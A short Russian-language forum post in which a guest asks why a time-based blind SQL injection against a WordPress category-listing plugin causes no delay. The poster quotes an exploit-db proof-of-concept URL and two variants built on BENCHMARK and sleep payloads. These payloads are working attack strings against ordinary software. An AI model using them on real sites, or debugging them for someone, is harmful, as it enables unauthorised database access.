
09.12.2012, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 29647
Репутация:
1
|
|
Сабж:Пытаюсь провести на уязвимом плагине wp SQL инъекцию,
Плагин на exploit-db
Poc: http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,10 9,97,112))),0)--%20
Я запрашиваю:
1) http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(100000,BENCHMARK(100000,md5(ble sse()))),0)--%20
2) http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,sleep(30),0)--%20
Какой либо задержки в обоих случаях не последовало.
Плагин на котором экспериментирую скачал от туда же(эксплоит помечен как верифицированный)mq=off. Значит где то я синтаксис нарушил?Или в чем может быть трабла?
|
|
|
|